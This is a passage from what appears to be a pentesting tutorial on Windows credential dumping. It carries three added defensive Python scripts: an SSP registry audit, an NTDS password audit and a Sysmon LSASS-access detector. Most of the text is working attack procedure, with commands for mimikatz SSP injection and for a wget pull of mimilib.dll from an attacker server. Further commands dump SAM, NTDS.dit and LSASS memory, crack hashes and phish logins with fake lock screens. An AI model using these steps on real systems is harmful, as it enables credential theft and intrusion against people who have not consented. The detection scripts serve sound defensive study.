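    for finding in audit_text(SAMPLE_TAMPERED):
        print("FINDING:", finding)
```

Feed it the saved output of the two reg query commands from each host; an empty findings list is the expected state. A non-empty Security Packages list is not automatically malicious (some third-party products register an SSP), so the allowlist should be extended with whatever your environment legitimately installs rather than silenced.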
Now, whenever the user reboots their PC, a file with the name of kiwissp.log will be created in
system32. Then this file will have your credentials stored in cleartext. Use the following command to
read the credentials:

type C:\Windows\System32\kiwissp.log

Mimikatz provides us with a module that injects itself in the memory and when the user is signed out
of the windows, then upon signing in the passwords are retrieved from the memory with the help of
this module. For this method, just load mimikatz and type:

privilege::debug
misc::memssp

Running the above commands will create the mimilsa.log file in system32 once a user logs in. To read this file use the following command:

type C:\Windows\System32\mimilsa.log

When dumping credentials remotely, Metasploit comes in handy. The kiwi extension that Metasploit provides allows us to dump credentials by manipulating SSP just like in our previous method. When you have a meterpreter session through Metasploit, use the load kiwi command to initiate the kiwi extension, and then inject the mimikatz module into memory using the following command:

kiwi_cmd misc::memssp

Now the module has been injected into memory. As this module creates the file with clear-text credentials only when the user logs in after the injection, we will force the lock screen on the victim so that after the next login we have our credentials. For this, run the following commands:

shell
RunDll32.exe user32.dll,LockWorkStation

Now we have forced the user to log out of the system. Whenever the user logs in again, our mimilsa file will be created in system32; read it with the following command:

type C:\Windows\System32\mimilsa.log

Just like Metasploit, Koadic too provides a similar mimikatz module, so let's get to dumping the credentials.
Once you have a session with Koadic, use the following module to inject the payload into memory:

use mimikatz_dynwrapx
set MIMICMD misc::memssp

Once the above module has executed successfully, use the following commands to force the user to sign out of Windows and then read the mimilsa file:

cmdshell 0
RunDll32.exe user32.dll,LockWorkStation
type mimilsa.log

As shown in the above image, you will have your credentials.

Empire is an outstanding tool; we have covered PowerShell Empire in a series of articles, to read them click here. With the help of mimikatz, Empire allows us to inject the payload into memory, which further allows us to retrieve Windows logon credentials. Once you have a session through Empire, use the following post-exploitation module to get your hands on the credentials:

usemodule persistence/misc/memssp
execute

After the module has executed successfully, all that is left to do is lock the user out of their system so that when they sign in, we get the file that saves the credentials in plaintext for us. Now, to lock the user out of their system, use the following module:

usemodule management/lock
execute

After the user logs in, the said file will be created. To read the contents of the file use the following command:

type C:\Windows\System32\mimilsa.log

Everything that we did in the manual method can also be done remotely through Empire, which is useful in external penetration testing. The first step in this method is to send the mimilib.dll file from the mimikatz folder to the system32 folder on the target system. To do so, simply go to the mimikatz folder where the mimilib.dll file is located and start a Python web server as shown in the following image:

python -m SimpleHTTPServer

After that, through your session, run the following shell commands to do the deed:

shell wget http://192.168.1.112:8000/mimilib.dll -outfile mimilib.dll
shell reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
shell reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f

Of the above commands, the first downloads mimilib.dll from the Python server you just started onto the target PC, and the other two edit the registry key value for you. Once the commands have executed successfully, all you have to do is wait for the target system to restart. When that happens, your file will be created. To access the file, use the following command:

shell type kiwissp.log

And we have our credentials. Yay!

SAM is short for Security Account Manager, which manages all the user accounts and their passwords. It acts as a database: all the passwords are hashed and then stored in SAM. It is the responsibility of the LSA (Local Security Authority) to verify a user login by matching the password against the database maintained in SAM. SAM starts running in the background as soon as Windows boots up. SAM is found in C:\Windows\System32\config, and the hashed passwords saved in SAM can also be found in the registry: just open the Registry Editor and navigate to HKEY_LOCAL_MACHINE\SAM.

To know how passwords are saved in windows, we will first need to understand what are LM, NTLM
v1 & v2, Kerberos.

LAN Manager (LM) authentication was developed by IBM for Microsoft's Windows operating systems. The security it provides is considered trivially breakable today. It converts the password into a hash by breaking it into two chunks of seven characters each and then encrypting each chunk separately. It is not case sensitive either, which is a huge drawback: the method converts the whole password string to uppercase, so an attacker running a brute-force or dictionary attack can leave out lowercase letters altogether. The key it uses to encrypt is 56-bit DES, which can now be cracked easily.

NTLM authentication was developed to secure systems after LM proved to be insecure. NTLM is based on a challenge-response mechanism and uses three components: the nonce (challenge), the response and the authentication.
When a password is stored in Windows, NTLM hashes it and keeps the hash while it disposes of the actual password. When the client authenticates, it sends the username to the server; the server creates a 16-byte random numeric string, the nonce, and sends it to the client. The client encrypts the nonce using the password hash and sends the result back to the server; this is the response. These three components (nonce, username and response) are then sent to the Domain Controller, which retrieves the user's password hash from the Security Account Manager (SAM) database, computes its own result from the nonce and compares it with the response. If they match, authentication is successful.
NTLM v1 and NTLM v2 work the same way, although there are a few differences: v1 uses MD4 and v2 uses MD5; the challenge/response length is 56 bits + 56 bits + 16 bits in v1, while v2 uses 128 bits; the C/R algorithm is DES (ECB mode) in v1 and HMAC_MD5 in v2; and lastly, the C/R value length is 64 bits + 64 bits + 64 bits in v1, while v2 uses 128 bits.
Now as we have understood these hashing systems, let’s focus on how to dump them. The methods
we will focus on are best suited for both internal and external pen-testing. Let’s begin!

NOTE: Microsoft changed the algorithm in Windows 10 v1607, replacing the RC4 cipher with AES. This change made the extraction tools that directly access the SAM to dump hashes obsolete. Some of the tools have been updated and handle the new encryption method properly, but others were not able to keep up.

This tool is developed by Tarasco and you can download it from here. It extracts the SAM file from the system and dumps its credentials. To execute this tool, just run the following command in the command prompt after downloading:

PwDump7.exe

As a result, it will dump all the hashes stored in the SAM file, as shown in the image above.
Now, we will save the registry hives of SAM and SYSTEM to files on the system by using the following commands:

reg save hklm\sam c:\sam
reg save hklm\system c:\system

We saved the values with the above command to retrieve the data from the SAM file.

Once you have saved the hives, you can use the SamDump2 tool to dump the hashes with the following command:

samdump2 system sam

Download Invoke-Powerdump Script

The Metasploit method involves PowerShell. After getting a meterpreter session, access Windows PowerShell with the load powershell command, and then use the following set of commands to run the Invoke-PowerDump.ps1 script.

powershell_import /root/powershell/Invoke-PowerDump.ps1
powershell_execute Invoke-PowerDump

Once the above commands execute the script, you will have the dumped passwords just as in the
image above.

Download Get-PassHashes Script
Again, via meterpreter, access Windows PowerShell using the load powershell command. Just like in the previous method, use the following commands to execute the script and retrieve the passwords.

powershell_import /root/powershell/Get-PassHashes.ps1
powershell_execute Get-PassHashes

And VOILA! All the passwords have been retrieved.

Download Invoke-Powerdump Script

This method is an excellent one for local testing, AKA internal testing. To use this method, simply type the following in PowerShell:

Import-Module <'path of the powerdump script'>
Invoke-PowerDump

And, it will dump all the credentials for you.

There is a good enough method to dump the hashes of the SAM file using mimikatz. The method is pretty easy and best suited for internal penetration testing. In one of our previous articles, we have covered mimikatz; to read that article, click here. In this method, we will use the token::elevate command, which allows mimikatz to access the SAM file to dump hashes. To use this method, run the following set of commands:

privilege::debug
token::elevate
lsadump::sam

The Impacket toolkit can also extract all the hashes for you from the SAM file with the following command:

./secretsdump.py -sam /root/Desktop/sam -system /root/Desktop/system LOCAL

When you have a meterpreter session of a target, just run the hashdump command and it will dump
all the hashes from the SAM file of the target system. The same is shown in the image below:

Another way to dump hashes is through the hashdump post-exploitation module that Metasploit offers. To use it, run the following set of commands:

use post/windows/gather/hashdump
set session 1
exploit

Another way to dump credentials using Metasploit is via another built-in post-exploitation module. To use it, simply background your session and run the following commands:

use post/windows/gather/credential/credential_collector
set session 1
exploit

The next method that Metasploit offers is firing up the mimikatz extension. Load it with the load kiwi command and then use the following command to dump the whole SAM file using mimikatz:

lsa_dump_sam

Once you have a session through Koadic C2, use the hashdump_sam module to get the passwords as shown below:

use hashdump_sam
execute

All the hashes from the SAM file will be dumped as shown in the above image.

Once you have a session through Empire, interact with the session and use the mimikatz/sam module to dump the credentials with the help of the following commands:

usemodule credentials/mimikatz/sam*
execute

This exploit will run mimikatz and will get you all the passwords you desire by dumping the SAM file.

LaZagne is an amazing tool for dumping all kinds of passwords. We have covered LaZagne in a dedicated previous article; to visit it, click here. Now, to dump SAM hashes with LaZagne, just use the following command:

lazagne.exe all

Yay!!! All the credentials have been dumped.

CrackMapExec is a sleek tool that can be installed with a simple apt install and it runs very swiftly. Using CrackMapExec we can dump the hashes in the SAM very quickly and easily. It requires a few things.
Requirements:
Username: Administrator
Password: Ignite@987
IP Address: 192.168.1.105
Syntax: crackmapexec smb [IP Address] -u '[Username]' -p '[Password]' --sam

crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --sam

John the Ripper is an amazing hash cracking tool. We have dedicated two articles to this tool; to learn more about John the Ripper, click here: part 1, part 2. Once you have dumped all the hashes from the SAM file by using any of the methods given above, you just need John the Ripper to crack the hashes with the following command:

john --format=NT hash --show

And as you can see, it will reveal the password by cracking the given hash.

Empire provides us with a module that retrieves saved credentials from various applications such as PuTTY, WinSCP, etc. It automatically finds passwords and dumps them for you without requiring you to do anything. Once you have your session in Empire, use the following commands to execute the module:

usemodule credentials/sessiongopher
execute

And as you can see in the images above and below, it successfully retrieves the passwords of WinSCP and PuTTY.

Now we will focus on fewer applications and see how we can retrieve their passwords. We will go
onto the applications one by one. Let’s get going!

The Core FTP server tool is made especially for Windows. It lets you send and receive files over the network. For this transfer of files it uses the FTP protocol, which makes it relatively easy to use irrespective of the operating system.
With the help of Metasploit, we can dump the credentials saved in the registry of the target system. The location of the password is HKEY_CURRENT_USER\SOFTWARE\FTPWare\CoreFTP\Sites. Once you have a session, run the post-exploitation module by typing:

use post/windows/gather/credentials/coreftp
set session 1
exploit

Just like Core FTP, FTP Navigator is an FTP client that makes transferring, editing and renaming files over the network easy. It also allows you to keep directories in sync for both local and remote users. We can use the command lazagne.exe all and we will have the FTP Navigator credentials as shown below:

The credentials of FTP Navigator can also be dumped using Metasploit, as there is a built-in post-exploitation module for it. To use it, type:

use post/windows/gather/credentials/ftpnavigator
set session 1
exploit

FileZilla is another open-source client/server software that runs on FTP protocol. It is compatible with
Windows, Linux, and macOS. It is used for transfer or editing or replacing the files in a network. We
can dump its credentials using Metasploit and do so, type:

use post/multi/gather/filezilla_client_cred
set session 1
exploit

HeidiSQL is an open-source tool for managing MySQL, MSSQL, PostgreSQL and SQLite databases. Numerous sessions with connections can be saved along with their credentials while using HeidiSQL. It also lets you run multiple sessions in a single window, and database management is pretty easy with this software. Again, with the help of Metasploit we can get our hands on its credentials by using the following post-exploitation module:

use post/windows/gather/credentials/heidisql
set session 1
exploit

All the email passwords that are stored on the system can be retrieved with the help of the tool named Mail PassView. This tool is developed by NirSoft and is best suited for internal pentesting. Simply download the software from here and launch the tool to get the credentials as shown below:

Pidgin is an instant messaging application that lets you chat over multiple networks. It is compatible with almost all operating systems and also allows you to transfer files. There is a built-in post-exploitation module for Pidgin in Metasploit too. To run it, use the following commands:

use post/multi/gather/pidgin_cred
set session 1
run

And all the credentials will be on your screen.

PSI is an instant messenger that works over the XMPP network. It also allows you to transfer files. It is highly customizable and comes in various languages. Using the lazagne.exe chat command in LaZagne you can dump its password as shown in the image below:

NirSoft provides a tool that lets you retrieve all the PST passwords from Outlook. You can download this tool from here. Simply launch the tool and you will have the passwords as shown below:

VNC is a remote access software that allows you to access your device from anywhere in the world.
VNC passwords can be easily retrieved by using Metasploit and to do so, type:

use post/windows/gather/credentials/vnc
set session 2
exploit

WinSCP is an FTP client which is based on the SSH protocol from PuTTY. It has a graphical interface and can be operated in multiple languages. It also acts as a remote editor. Both LaZagne and Metasploit help us retrieve its passwords. In LaZagne, use the command lazagne.exe all and it will dump the credentials as shown in the image below:

To retrieve the credentials from Metasploit, use the following exploit:

use post/windows/gather/credentials/winscp
set session 1
exploit

This way, you can retrieve the credentials of multiple applications.

NTDS stands for New Technologies Directory Services and DIT stands for Directory Information Tree.
You can find the NTDS file at “C:\Windows\NTDS”. This file acts as a database for Active Directory and
stores all its data including all the credentials. The Default size of Ntds.dit is 12 MB which can be
extended up to 16TB.
The active directory database is stored in a single NTDS.dit file which is logically separated into the
following partitions:

If you take a look at the information that NTDS provides, you can see that the Schema partition contains all the necessary information about objects along with their attributes and their relation to one another. The Configuration partition holds all the forests and trees, and is replicated to all the domain controllers. The Domain partition consists of all the information related to the domain. And finally, all the details related to any application are stored in the Application partition of Active Directory. From a different perspective, you can also divide the data found in NTDS into the Link table and the Data table: the Link table has all the attributes which refer to objects, and the Data table contains all the data related to users, groups, etc.
The physical structure of NTDS has the following components.

Data Store Physical Structure Components

Now that we have an idea about the NTDS, it is time to extract some of those precious hashes from
the Server. We have the Windows Server with Active Directory setup in our lab environment for the
following practical.

FGDump is a tool that was created for mass password auditing of Windows systems, which means that an attacker can use FGDump to extract passwords from a target machine. For this purpose, we will need to download FGDump from this link.
We fire up the Windows command prompt and change to the path where we downloaded FGDump; in this case, it is the Downloads directory. As FGDump is an executable, we ran it directly from the command prompt.

fgdump.exe

As no parameters were provided, FGDump did a local dump by default. After auditing the local passwords, FGDump dumped the passwords and cache successfully. Now let's take a look at the dumped data.

FGDump creates a file with the extension PWDump and dumps the hashes into that file. The name of the server is used as the name of the PWDump file. We can read the data in the file using the type command. As shown in the image given below, FGDump has successfully dumped hashes from the target system.

type <pwdump file name>

Enough with the Windows command prompt, it's time to move on to PowerShell. We are going to use another executable called NTDSutil.exe. We launch an instance of PowerShell and run NTDSutil.exe with a set of parameters instructing it to make a directory called temp in the C:\ drive, then tap into the Active Directory database and fetch the SYSTEM and SECURITY hive files as well as the ntds.dit file. After working for a while, we have the hive files in the temp directory.

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

We transfer the hive files onto our Kali Linux machine to extract hashes from them. We will be using the secretsdump.py script from the Impacket toolkit. All we need is to provide the path of the SYSTEM hive file and the NTDS.dit file and we are good to go. In a matter of seconds, secretsdump extracts the hashes for us.

./secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCAL

DSInternals is a framework designed by Michael Grafnetter for performing AD security audits. It is part of the official PowerShell Gallery, which means we can download it by using the Save-Module cmdlet. After downloading, we need to install the module before using it, which can be done using the Install-Module cmdlet and requires a change in the execution policy. After installing the module, we are good to go.
We first use the Get-BootKey cmdlet to extract the boot key from the SYSTEM hive. After obtaining the boot key, we use it to read the data of one or more accounts from the NTDS file, including secret attributes like hashes, using the Get-ADDBAccount cmdlet.

Save-Module DSInternals -Path C:\Windows\System32\WindowsPowershell\v1.0\Modules
Set-ExecutionPolicy Unrestricted
Import-Module DSInternals
Get-BootKey -SystemHivePath 'C:\SYSTEM'
Get-ADDBAccount -All -DBPath 'C:\ntds.dit' -BootKey <bootkey value>

The Get-ADDBAccount cmdlet produces a long sequence of output. Here we are showing the data of one of the users of the target machine. We can see that we have successfully extracted the NTLM hashes from the NTDS.dit file.

Now it's time to use some external tools for attacking the NTDS file. We will be using NTDSDumpEx for this particular practical. You can download it from here. We unzip the contents of the compressed file we downloaded and then use the executable to attack the NTDS file. We need to provide the path to the ntds.dit file and the SYSTEM hive file. In no time NTDSDumpEx gives us a list of the users with their respective hashes.

NTDSDumpEx.exe -d C:\ntds.dit -s C:\SYSTEM

For all the Metasploit fans, there is no need to get depressed. Metasploit can work just fine for extracting hashes from the NTDS.dit file. We have two modules that work side by side to target NTDS. The first one locates the ntds file. We need a session on the target system to move forward. After we gain a session, we choose the ntds_location module and set the session identifier. Upon running it, we see that we have the location of the NTDS.dit file.

use post/windows/gather/ntds_location
set session 1
exploit

Moving on, we use another exploit that can extract the NTDS.dit file, SAM and SYSTEM hive files from
the Target System. The catch is, it transfers these files in .cab compressed files.

use post/windows/gather/ntds_grabber
set session 1
exploit

The module works and transfers the cab file to a location that can be seen in the image. Now, to extract the NTDS.dit and the other hive files, we are going to use a tool called cabextract. This will extract all three files.

cabextract <cab filename>

Now that we have the NTDS and the hive files at our disposal, we can use the impacket’s secretsdump
script to extract hashes from it as we did earlier.

Suppose a scenario where we were able to procure the login credentials of the server by any method
but it is not possible to access the server directly, we can use this exploit in the Metasploit framework
to extract the hashes from the NTDS.dit file remotely. We will use this auxiliary to grab the hashes.
We need to provide the IP Address of the Target Machine, Username and Password. The auxiliary will
grab the hashes and display them on our screen in a few seconds.

use auxiliary/scanner/smb/impacket/secretsdump
set rhosts 192.168.1.108
set smbuser administrator
set smbpass Ignite@987
exploit

CrackMapExec is a sleek tool that can be installed with a simple apt install and it runs very swiftly. NTDS.dit acts as the database for Active Directory and stores all its data including all the credentials, and CrackMapExec can dump the hashes from it remotely, as discussed previously. It requires a few things.
Requirements:
Username: Administrator
Password: Ignite@987
IP Address: 192.168.1.105
Syntax: crackmapexec smb [IP Address] -u '[Username]' -p '[Password]' --ntds drsuapi

crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --ntds drsuapi

To confirm that the extracted hashes can be cracked, we take one of them and crack it
with John the Ripper. We need to specify the format of the hash, which is NT. John the Ripper
cracks the password in a matter of seconds.

cat hash
john --format=NT hash --show
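Once a full NTDS dump is in hand, the defensive use of it is a password audit: which accounts have an empty password, which still carry an LM hash, and which accounts share one NT hash (and therefore one password). The following Python script is an added example (not code from the article or from the Impacket project): it parses lines in the secretsdump output format used above, domain\user:RID:LM hash:NT hash:::, and reports those three findings. The sample dump below is constructed; the domain and user names follow this page's lab, and the hash values are obviously fake apart from the two well-known constants for an empty LM hash and an empty NT hash.

```python
from collections import defaultdict

# Well-known constants of the hash formats (not values from this page):
# LM hash of an empty/disabled LM password, and NT hash of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample output in secretsdump style: domain\user:RID:LM:NT:::
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
ignite.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:1111111111111111111111111111aaaa:::
ignite.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ignite.local\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2222222222222222222222222222bbbb:::
ignite.local\\yashika:1105:aad3b435b51404eeaad3b435b51404ee:1111111111111111111111111111aaaa:::
ignite.local\\kavish:1106:0123456789abcdef0123456789abcdef:3333333333333333333333333333cccc:::
ignite.local\\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
"""


def parse_secretsdump(text):
    """Return (account, rid, lm_hash, nt_hash) tuples from secretsdump-style text.

    Lines that do not have the account:rid:lm:nt::: shape (status messages,
    blank lines) are skipped rather than treated as errors.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line.endswith(":::"):
            continue
        parts = line[:-3].split(":")
        if len(parts) != 4:
            continue
        account, rid, lm_hash, nt_hash = parts
        if not (rid.isdigit() and len(lm_hash) == 32 and len(nt_hash) == 32):
            continue
        entries.append((account, int(rid), lm_hash.lower(), nt_hash.lower()))
    return entries


def audit_entries(entries):
    """Flag the findings a password audit cares about.

    Returns a dict with three keys:
      empty_password  - accounts whose NT hash is the hash of the empty string
      lm_hash_present - accounts that still store a real LM hash (weak, unsalted)
      shared_nt_hash  - {nt_hash: [accounts]} for every NT hash used by 2+ accounts
    """
    by_hash = defaultdict(list)
    empty_password, lm_present = [], []
    for account, _rid, lm_hash, nt_hash in entries:
        if nt_hash == EMPTY_NT:
            empty_password.append(account)
        if lm_hash != EMPTY_LM:
            lm_present.append(account)
        by_hash[nt_hash].append(account)
    shared = {h: accts for h, accts in by_hash.items() if len(accts) > 1}
    return {"empty_password": empty_password,
            "lm_hash_present": lm_present,
            "shared_nt_hash": shared}


def audit_dump(text):
    """Parse and audit a secretsdump-style text in one step."""
    return audit_entries(parse_secretsdump(text))


if __name__ == "__main__":
    for category, result in audit_dump(SAMPLE_DUMP).items():
        print(f"{category}: {result}")
```

Feed it the real output file instead of SAMPLE_DUMP to audit a production dump; the shared-hash finding is the one that usually matters most, since it exposes reused passwords across privileged and unprivileged accounts without cracking anything.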

This concludes the various methods by which the hashes stored on a Windows
server can be extracted. We included multiple tools to cover the various scenarios that an attacker can face. The
only way to protect yourself against such attacks is to minimise the number of users who can access Domain
Controllers, recertify that access frequently, and continuously log and monitor their activity for any changes.

Metasploit comes with a built-in post-exploitation module that does the job. As it is a post-exploitation
module, it just needs to be attached to an ongoing session. To use this module, simply type:

use post/windows/gather/phish_windows_credentials
set session 1
exploit

This module waits for the user to start a new process. Once the process starts, a
fake Windows security dialogue box opens, asking for the user's credentials, as shown in the image
below:

As the user enters their credentials, they are captured and displayed as shown in the image
below:

The FakeLogonScreen tool was created by Arris Huijgen. It is written in C#, which allows various
frameworks to inject the utility into memory. We will execute this tool remotely using Metasploit. But
first, let's download the tool using the link provided below:
Download FakeLogonScreen
We simply upload this tool through our meterpreter session and then execute it remotely using the
following set of commands:

upload /root/FakeLogonScreen.exe .
shell
FakeLogonScreen.exe

Upon execution, it simulates the Windows lock screen to obtain the password from the user. To do
so, the tool renders the lock screen exactly as it is configured, so that the user does not get
suspicious, as shown in the image below:

It validates the credentials locally or against the Domain Controller as the user enters them, and then
displays them on the console as shown in the image below:

This tool is very similar to the previous one. It was developed by Matt Pickford. Just like
FakeLogonScreen, this tool also displays a fake lock screen for the user to enter their credentials into, and
then dumps them keystroke by keystroke to the attacker.
Download SharpLocker
We first upload this tool from our attacker machine to the target system and then execute it. So,
once you have the meterpreter session, just type:

upload /root/Downloads/SharpLocker.exe .
shell
SharpLocker.exe
We placed the tool on the Desktop, so we traverse to that location and then execute it.

Upon execution the tool will trigger the lock screen of the target system as shown in the image below:

And as the user enters the password, it captures the keystrokes until the whole password is
revealed, as shown in the image below:

This module of PowerShell Empire prompts a dialogue box on the target system asking for
credentials, as we did earlier. We can use this module with the following commands:

usemodule collection/prompt
execute

Once the user types the credentials into the dialogue box, the module displays them on the terminal,
as shown in the image below:

This module of PowerShell Empire triggers a restart notification like the one generated when
updates require a reboot to install. To use this module, type the following commands:

usemodule collection/toasted
execute

Once the module executes, it will show the following dialogue box:

And once the Postpone button is clicked, it asks for credentials to validate the decision to postpone,
as shown in the image below:

And as the user enters the credentials, it prints them as shown in the image below:

A module similar to the one in PowerShell Empire can be found in Koadic. Once you have a session
in Koadic, use the following commands to trigger the dialogue box:

use password_box
execute

When the user enters the username and password in the dialogue box, the password is displayed
in the terminal too, as shown in the image below:

There is a PowerShell script that creates a fake login prompt for the user to enter
their credentials into.
Download Invoke-CredentialsPhish.ps1
To initiate the script, type:

Import-Module C:\Users\raj\Desktop\Invoke-CredentialsPhish.ps1
Invoke-CredentialsPhish

Executing the above commands pops up a prompt asking for credentials, as shown in the
image below:

So, once the user enters the credentials, they are displayed on the screen as shown in the image
below:

Similarly, there is another script, developed by Matt Nelson. This script again opens a dialogue box
for the user to enter their password into.
Download Invoke-LoginPrompt.ps1
To initiate the script, type the following:

Import-Module C:\Users\raj\Desktop\Invoke-LoginPrompt.ps1
Invoke-LoginPrompt

As you can see, the dialogue box appears on the screen; once the user enters the credentials,
they are displayed back on the terminal.

Lockphish is another tool that allows us to phish for credentials; you can download this tool from
here. This tool creates a template that appears to redirect the user to a YouTube video hosted
on a PHP server, but instead it prompts the user to enter their login credentials and then sends
them to the attacker.
Start the tool using the following command:

./lockphish.sh

It generates a public link using ngrok, as shown in the image above; send that link to the target.
When the target opens the link, it asks them to save a file. For this step, strong social engineering skills
are required.

And after the user has entered the credentials, it redirects the user to YouTube.

Then, upon executing the downloaded file, the lock screen is triggered and the user is forced
to enter their credentials, as shown in the image below:

And we have our credentials, as shown in the image below:

Credential Dumping: Local Security Authority (LSA | LSASS.EXE)
LSA and LSASS stand for "Local Security Authority" and "Local Security Authority Subsystem
Service", respectively.
The Local Security Authority (LSA) is a protected system process that authenticates and logs users on
to the local computer. Domain credentials are used by the operating system and authenticated by the
Local Security Authority (LSA). The LSA can validate user information by checking the Security Accounts
Manager (SAM) database located on the same computer.
The LSA is a user-mode process (LSASS.EXE) used to store the security information of a system, known
as the Local Security Policy. The LSA maintains local security policy information in a set of objects:
• Policy contains global policy information.
• TrustedDomain contains information about a trusted domain.
• Account contains information about a user, group, or local group account.
• Private Data contains protected information, such as server account passwords. This
information is stored as encrypted strings.
LSASS manages the local system policy, user authentication, and auditing while handling sensitive
security data such as password hashes and Kerberos keys. The secret part of domain credentials, the
password, is protected by the operating system. Only code running in-process with the LSA can read
and write domain credentials.
LSASS can store credentials in multiple forms, including:
• Reversibly encrypted plaintext
• Kerberos tickets (ticket-granting tickets (TGTs), service tickets)
• NT hash
• LAN Manager (LM) hash

On the local (target) machine, open Task Manager, go to the Processes tab, find the
running lsass.exe process, right-click it and choose the "Create dump file"
option, which dumps the process memory together with the stored credentials.

You will find the lsass.DMP file inside the Temp directory of the user's profile, under
AppData\Local (for example C:\Users\raj\AppData\Local\Temp\lsass.DMP).

Now start mimikatz to get the data out of the DMP file using the following command:

privilege::debug
sekurlsa::minidump C:\Users\raj\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

As you can see from the image below, we have a clear text password.

ProcDump is a free command-line tool published by Sysinternals whose primary purpose is
monitoring an application and generating memory dumps.
Use the -accepteula option to automatically accept the Sysinternals licence
agreement and the -ma option to write a dump file containing all of the process memory (lsass.exe) in .dmp
format.

procdump.exe -accepteula -ma lsass.exe mem.dmp

Again, repeat the same step and use mimikatz to read the mem.dmp file.

privilege::debug
sekurlsa::minidump C:\Users\raj\Downloads\Procdump\mem.dmp
sekurlsa::logonpasswords

And now, as you can see from the image below, we’ve got a clear-text password.

The comsvcs.dll library found in Windows\System32 exports a MiniDump function that can be called through rundll32, so it can be used
to dump the lsass.exe process memory and retrieve credentials. Let's identify the process ID of lsass
before running the DLL.

Get-Process lsass
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 492 C:\mem.dmp full

Again, repeat the same step and use mimikatz to read the mem.dmp file.

privilege::debug
sekurlsa::minidump C:\mem.dmp
sekurlsa::logonpasswords

Again, we’ve got a clear-text password.
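Each of the three dumping methods above (Task Manager, ProcDump and rundll32 with comsvcs.dll) has to open a handle to lsass.exe with the right to read its memory, and that is exactly what Sysmon Event ID 10 (ProcessAccess) records on the endpoint. The following Python script is an added example written for defenders; it is not code from the article or from any of the tools it describes. It parses a few constructed Sysmon Event 10 records flattened to key=value form and flags every handle to lsass.exe that carries the PROCESS_VM_READ right (0x0010) or full access (0x1FFFFF) from a source image outside a small allow list. The allow list, the event lines and the timestamps are constructed and should be tuned to the environment.

```python
import re

# Bits of the Win32 process access mask. A minidump needs VM_READ together with
# QUERY_INFORMATION (0x0400) or QUERY_LIMITED_INFORMATION (0x1000).
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF

# Constructed allow list of source images that open lsass.exe as part of normal
# operation; an EDR or backup agent would be added here after verification.
ALLOWED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed Sysmon records, one event per line, reduced to key=value pairs.
SAMPLE_EVENTS = """\
EventID=10 UtcTime=2021-05-01 10:00:01.000 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000
EventID=10 UtcTime=2021-05-01 10:02:13.000 SourceImage=C:\\Users\\raj\\Downloads\\Procdump\\procdump.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF
EventID=10 UtcTime=2021-05-01 10:03:40.000 SourceImage=C:\\Windows\\System32\\rundll32.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1410
EventID=10 UtcTime=2021-05-01 10:04:02.000 SourceImage=C:\\Windows\\System32\\Taskmgr.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1410
EventID=10 UtcTime=2021-05-01 10:05:55.000 SourceImage=C:\\Windows\\System32\\rundll32.exe TargetImage=C:\\Windows\\System32\\notepad.exe GrantedAccess=0x1FFFFF
EventID=1 UtcTime=2021-05-01 10:06:00.000 Image=C:\\Windows\\System32\\cmd.exe CommandLine=cmd.exe
"""

# key=value pairs whose values may contain spaces (e.g. UtcTime); a value runs
# until the next " key=" or the end of the line.
_FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")


def parse_event(line):
    """Turn one 'key=value key=value' record into a dict."""
    return {k: v.strip() for k, v in _FIELD_RE.findall(line)}


def is_lsass_read(event):
    """True when the event is a ProcessAccess record opening lsass.exe with memory-read rights."""
    if event.get("EventID") != "10":
        return False
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    try:
        access = int(event.get("GrantedAccess", "0"), 16)
    except ValueError:
        return False
    return bool(access & PROCESS_VM_READ) or access == PROCESS_ALL_ACCESS


def find_lsass_dumps(text):
    """Return (UtcTime, SourceImage, GrantedAccess) for each suspicious lsass.exe access."""
    hits = []
    for line in text.splitlines():
        event = parse_event(line)
        if not is_lsass_read(event):
            continue
        if event.get("SourceImage", "").lower() in ALLOWED_SOURCES:
            continue
        hits.append((event["UtcTime"], event["SourceImage"], event["GrantedAccess"]))
    return hits


if __name__ == "__main__":
    for when, source, access in find_lsass_dumps(SAMPLE_EVENTS):
        print(f"{when} possible LSASS memory dump by {source} (GrantedAccess={access})")
```

The rule keys on the access right rather than on the tool name, so a renamed procdump.exe or a copy of rundll32 is caught just the same; the price is that the allow list must be maintained, because security agents legitimately read LSASS memory too.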

On Windows 10, lsass.exe is listed under the name "Local Security Authority" in Task Manager.
It also saves the dump file in .dmp format, so again
repeat the same steps as above.
Go to Task Manager, find the Local Security Authority process, then extract its dump as
shown.

You will find the lsass.DMP file inside the Temp directory of the user's profile, under
AppData\Local.

Again, repeat the same step and use mimikatz to read the dmp file.

privilege::debug
sekurlsa::minidump C:\Users\raj\AppData\Local\Temp\lsass.DMP
sekurlsa::logonpasswords

Because this is Windows 10, where the level of protection is higher, we obtained the
